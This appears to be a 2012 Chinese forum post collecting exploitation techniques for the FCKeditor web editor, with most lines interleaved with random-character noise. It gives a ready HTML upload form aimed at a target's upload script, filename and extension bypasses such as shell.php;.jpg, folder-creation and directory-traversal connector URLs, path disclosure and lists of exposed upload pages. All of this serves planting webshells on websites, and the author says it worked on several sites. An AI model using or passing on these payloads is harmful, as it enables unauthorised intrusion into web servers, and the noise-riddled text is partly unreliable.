Fckeditor漏洞利用总结
8 c s B: |) i查看编辑器版本
Y* X( s ]) x2 G/ D4 cFCKeditor/_whatsnew.html( N3 w9 ]5 q8 L( t2 H4 o6 x
—————————————————————————————————————————————————————————————* ]/ C6 M$ O' [5 `
1 W0 B' t) f$ `+ x2. Version 2.2 版本
* _/ L/ C1 q3 u: g5 ~4 q7 LApache+linux 环境下在上传文件后面加个.突破!测试通过。3 d1 t7 ?. t% ~8 J
—————————————————————————————————————————————————————————————7 _! R# ?# B; Q
3 z0 m& o# m8 ]+ \( t* q
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。: R* o, _# O' [& z% v8 S1 O0 x6 [
<form id="frmUpload" enctype="multipart/form-data"1 i- Z2 t. T |5 K/ p
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>. C- g7 @$ K7 D" P8 I
<input type="file" name="NewFile" size="50"><br>6 r" I% k$ b! l7 f" y
<input id="btnUpload" type="submit" value="Upload"># U, b* q3 s* t6 s' Z+ i
</form>
* F6 }9 O k, w, q—————————————————————————————————————————————————————————————0 r7 F3 n3 w2 D# J7 S& I2 ~
- O3 X# P `* b6 s& L9 q1 |7 }4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
) q4 ?. k, K2 u5 o 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。: v! g3 Q8 X i5 v) n' E9 `
4.1:提交shell.php+空格绕过
: T. h) G3 v1 L0 k) G不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。% n8 b: ^8 u3 s$ D( ~+ j- l" d) p
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。; T( {- q7 |" _! L' E
—————————————————————————————————————————————————————————————
9 p' l0 B3 B8 ]* u+ T
4 D* T1 {/ f7 ^3 Z4 \! B5. 突破建立文件夹9 {1 Q9 y" c* _% g
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
$ z" g; l' K, W# J0 |; n; DFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp3 c: s, Y& b+ D/ v, H% I. b' I# o
—————————————————————————————————————————————————————————————
! D% l ]) @6 [# E3 g7 U' V' J$ E$ d, D0 t
6. FCKeditor 中test 文件的上传地址
$ e, @3 d& X$ k8 `* |& _! sFCKeditor/editor/filemanager/browser/default/connectors/test.html
6 F4 ^( W9 d- m" V% x6 r' V wFCKeditor/editor/filemanager/upload/test.html$ R6 o) I6 N9 }# P+ Z5 }! `
FCKeditor/editor/filemanager/connectors/test.html
! p- c2 Z; s+ U8 @- Z% U' pFCKeditor/editor/filemanager/connectors/uploadtest.html. X$ U* S9 P$ J6 r% k
—————————————————————————————————————————————————————————————
0 {7 m6 D) c5 ^6 M, x8 c, ~: ]
7 \$ X$ J6 J0 J7 R# H7.常用上传地址
! K, ^8 I/ u# p B4 `FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/: d# U* R& m$ J/ W
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
2 \% _& [; V- T7 a* O& }FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
. O) n! ~. W* z$ E% g7 Z; jJSP 版:% Y# \9 {( [2 _2 V2 y5 l
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
2 X/ W/ e4 c' o4 W2 g# R% P: N注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文$ p- \' q( b' e% x2 g
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。1 N) N- O* |' z. D% u3 d( k
—————————————————————————————————————————————————————————————0 p( V# q' W/ S& P
) M: I. _1 N, p Z* R
8.其他上传地址$ k4 q, ^2 {* X0 z
FCKeditor/_samples/default.html2 A* y4 ^3 n( M
FCKeditor/_samples/asp/sample01.asp
2 [5 d( t$ ^: |0 a( Z3 c. H' p+ AFCKeditor/_samples/asp/sample02.asp. v S- {) H% o) |" x& T& T
FCKeditor/_samples/asp/sample03.asp
- z { {: [2 UFCKeditor/_samples/asp/sample04.asp
+ u+ f8 x4 u$ |. d- z6 w一般很多站点都已删除_samples 目录,可以试试。
# t: ]5 F) H2 ZFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
- l1 v# {- i1 G—————————————————————————————————————————————————————————————& _+ ?$ f$ o# z0 B
* V/ ]$ H' {7 H' o9 S0 K7 T8 b
9.列目录漏洞也可助找上传地址
, L( x% M% T6 E4 ?9 cVersion 2.4.1 测试通过. d5 ~: }! p2 ?% f% Y
修改CurrentFolder 参数使用 ../../来进入不同的目录
9 u3 l- w- p: i: P/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp5 G2 n+ e4 ^& p! i6 ~( Z0 O3 V
根据返回的XML 信息可以查看网站所有的目录。' S0 }. d/ B. D7 h
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F$ A, L& Q' O: y; q. z) V+ G! Y
也可以直接浏览盘符:
6 @& Q/ _/ i5 _2 }2 c& m# s( nJSP 版本:
/ y- r, X# Z! ]2 S6 v+ j* SFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
& e/ j x m8 @—————————————————————————————————————————————————————————————
9 G4 A, ?+ o. r2 W, D& g+ y6 f* H) C* g
10.爆路径漏洞
0 Y V3 m* ~& }# r7 P% mFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
: Q$ _9 g ^, q/ r! ~—————————————————————————————————————————————————————————————) X9 \) [) P! J, r9 |0 v! W4 k
/ o; c% K" p0 Z7 Q- S2 c R) b
11. FCKeditor 被动限制策略所导致的过滤不严问题6 L& e- j9 V& A
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
' N0 h9 o" Q6 ]3 _& X脆弱描述:
; [% B0 t7 F2 p2 H4 I FFCKeditor v2.4.3 中File 类别默认拒绝上传类型:5 I' e: w8 ~2 i- k0 w; x ]3 _
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm" j1 K! n7 R4 |
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!% ]. t7 c; J I9 d- }' t5 k7 v, N: Y
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
/ | h1 R. k. [8 p- d3 k0 ^ 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!1 F, k+ W' {( p* e
—————————————————————————————————————————————————————————————$ \% W% Q) X% X% S) X
8 H1 Z; o! {* L) B; }12.最古老的漏洞,Type文件没有限制!
{& T% m8 h' ~7 h* `9 J) p. u 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! 6 z! R& A! w& O- T' j* m& r' Q0 m
—————————————————————————————————————————————————————————————
, m# N Z3 y/ @) v0 w0 ?, b" Y8 ?5 B& J2 c
===============================================================================================================================================
! i; F1 I! }/ j8 _: I, i
' u3 s2 H K2 w' S3 f8 O% P8 DFCK编辑器jsp版本漏洞:
" O8 `' b* V3 Q {3 z4 w7 t' N
" C: ~3 P8 s/ b. I: R* }" c* Z% |# U; ?2 T: d
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
( p: O D. G; `
6 ~, s) v+ J' T- r( p0 p上传马所在目录% A1 Z8 A% F+ b5 h* U
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
3 b1 ?9 ^0 \# P, H( Z) s上传shell的地址:7 Y9 I& K* S/ O" \0 b/ f' p
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
% A; a$ F9 L3 t2 Y3 @跟版本有关系.并不是百分百成功. 测试成功几个站.' F: @1 E# J2 [, u# s) E1 m' k
不能通杀.很遗憾.0 L8 m; _5 u& x, j
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
$ u4 c; t* S6 n# k/ c* i5 S9 d如果以上地址不行可以试试
8 h P! X; i5 Z+ v' @FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
5 ~6 O2 s4 g0 F! l1 }) qFCKeditor/_samples/
) {1 e1 n7 f5 V# OFCKeditor/_samples/default.html
! d4 u( Q, S% M8 ~9 @FCKeditor/editor/fckeditor.htm$ x1 ^/ u9 l8 u# P* x# Z+ u
FCKeditor/editor/fckdialog.html
8 f+ i) o' [$ o# U4 U8 s; h
8 j. I" P' v o+ h; J7 X& H% a. m( S8 P
# Y( b6 _- T( ^. e2 [* O解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
# [" K+ q1 O' }) G I0 H9 l# ~ |
发表于 2012-9-13 17:01:39
收藏
支持
反对